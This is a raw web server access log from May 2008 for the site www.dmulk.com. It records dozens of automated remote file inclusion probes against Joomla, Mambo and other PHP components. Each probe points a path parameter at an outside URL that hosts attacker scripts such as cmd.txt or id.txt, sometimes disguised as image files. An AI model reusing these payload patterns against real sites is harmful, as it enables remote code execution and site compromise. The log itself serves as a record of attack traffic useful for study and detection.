219.94.128.57 - - [05/May/2008:10:56:43 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:56:45 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.86.32.149 - - [05/May/2008:10:56:48 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.warezscript.net/cache/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
71.86.32.149 - - [05/May/2008:10:56:57 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.warezscript.net/cache/r0x.id.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:56:58 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:10:57:03 -0700] "GET /logs/forum.php?act=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:10:57:04 -0700] "GET /forum.php?act=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.102.30.2 - - [05/May/2008:10:57:05 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.sghummeltal.de//components/com_simpleboard/uploaded/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
212.102.30.2 - - [05/May/2008:10:57:05 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.sghummeltal.de//components/com_simpleboard/uploaded/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:57:17 -0700] "GET /logs/home.php?inc=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:57:18 -0700] "GET /logs/home.php?inc=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:57:18 -0700] "GET /home.php?inc=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:57:18 -0700] "GET /home.php?inc=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:10:57:35 -0700] "GET /logs/access_080215.log/?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:10:57:44 -0700] "GET /logs/access.log/index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:10:57:50 -0700] "GET /logs/index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:10:57:50 -0700] "GET /index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:10:58:01 -0700] "GET /logs/access.log//modules/agendax/addevent.inc.php?agendax_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:10:58:01 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:10:58:02 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.103.159.159 - - [05/May/2008:10:58:06 -0700] "GET /logs/access_080220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:10:58:16 -0700] "GET /logs/access_080118.log/?GLOBALS[mosConfig_absolute_path]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.63.9.163 - - [05/May/2008:10:58:37 -0700] "GET /logs/access_080309.log//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
210.86.181.227 - - [05/May/2008:10:59:03 -0700] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:10:59:27 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:10:59:28 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.103.159.159 - - [05/May/2008:10:59:49 -0700] "GET /logs/access_080127.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.91.224.9 - - [05/May/2008:11:00:03 -0700] "GET /logs/access_071214.log HTTP/1.1" 200 157483 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
190.54.49.157 - - [05/May/2008:11:00:41 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
190.54.49.157 - - [05/May/2008:11:00:41 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:11:00:53 -0700] "GET /logs/access.log/index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:11:00:59 -0700] "GET /logs/index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.49 - - [05/May/2008:11:01:00 -0700] "GET /index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:01:01 -0700] "GET /logs//language.inc.php?langs_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:01:02 -0700] "GET //language.inc.php?langs_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:01:05 -0700] "GET /logs/access.log/index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:11:01:09 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:11:01:09 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:01:11 -0700] "GET /logs/index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:01:11 -0700] "GET /index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:11:01:58 -0700] "GET /logs/access_080205.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:11:01:58 -0700] "GET /sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:11:01:58 -0700] "GET /logs/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:11:02:58 -0700] "GET /logs/access_080121.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:03:07 -0700] "GET /logs/access_080311.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:03:07 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:03:07 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.69.211 - - [05/May/2008:11:03:48 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.69.211 - - [05/May/2008:11:03:54 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.69.211 - - [05/May/2008:11:03:54 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:11:04:15 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:11:04:15 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:11:04:16 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:11:04:16 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.179.175.72 - - [05/May/2008:11:04:22 -0700] "GET /logs/access_080215.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:11:04:26 -0700] "GET //?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:11:04:34 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:11:04:34 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:11:04:34 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
196.35.158.180 - - [05/May/2008:11:04:38 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:04:56 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:05:20 -0700] "GET /logs/access.log/index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:11:05:25 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:11:05:26 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:05:26 -0700] "GET /logs/index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:05:26 -0700] "GET /index.php?sayfa=http://turque.org/id2.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:05:37 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.197.2 - - [05/May/2008:11:05:47 -0700] "GET /logs/access_080311.log//modules/agendax/addevent.inc.php?agendax_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.224.83 - - [05/May/2008:11:06:53 -0700] "GET /logs/access.log/!scanhttp://www.autonomic.nl/en/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.224.83 - - [05/May/2008:11:06:53 -0700] "GET /!scanhttp://www.autonomic.nl/en/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.224.83 - - [05/May/2008:11:06:53 -0700] "GET /logs/!scanhttp://www.autonomic.nl/en/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.201.13.98 - - [05/May/2008:11:06:59 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.sghummeltal.de//components/com_simpleboard/uploaded/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:07:00 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:07:02 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:11:07:04 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:11:07:04 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:11:07:05 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.201.13.98 - - [05/May/2008:11:07:08 -0700] "GET //index.php?option=com_custompages&cpage=http://www.sghummeltal.de//components/com_simpleboard/uploaded/tetas.jpg?? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
203.146.251.123 - - [05/May/2008:11:07:38 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.91.246.64 - - [05/May/2008:11:08:01 -0700] "GET /logs/access_071229.log//login.php?dir=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [05/May/2008:11:08:02 -0700] "GET /logs//login.php?dir=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:08:04 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:08:04 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:08:05 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:08:05 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:08:05 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:08:08 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.91.246.64 - - [05/May/2008:11:08:11 -0700] "GET /logs/access_080211.log//login.php?dir=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:08:17 -0700] "GET /logs/access_071224.log//admin/index.php?o=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:08:17 -0700] "GET //admin/index.php?o=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:11:08:18 -0700] "GET /logs//admin/index.php?o=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.9.163 - - [05/May/2008:11:08:45 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
77.221.141.186 - - [05/May/2008:11:08:57 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.141.186 - - [05/May/2008:11:08:57 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.50.90.214 - - [05/May/2008:11:08:57 -0700] "GET /logs/access_080215.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:11:08:58 -0700] "GET /logs/access_080121.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:11:08:58 -0700] "GET /sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:11:08:58 -0700] "GET /logs/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:11:09:14 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:11:09:14 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:11:09:29 -0700] "GET /logs/access_080205.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
211.202.2.232 - - [05/May/2008:11:09:34 -0700] "GET /logs/access_080311.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.232 - - [05/May/2008:11:09:34 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.190.195.101 - - [05/May/2008:11:09:40 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.105 - - [05/May/2008:11:09:46 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.0" 200 11590 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:09:56 -0700] "GET /logs/access_080122.log/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.249.117.66 - - [05/May/2008:11:10:00 -0700] "GET /logs/access_080122.log/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:10:01 -0700] "GET /logs/access_080122.log/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:10:02 -0700] "GET /logs/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:10:02 -0700] "GET /logs/access_080122.log/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.249.117.66 - - [05/May/2008:11:10:06 -0700] "GET /logs/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
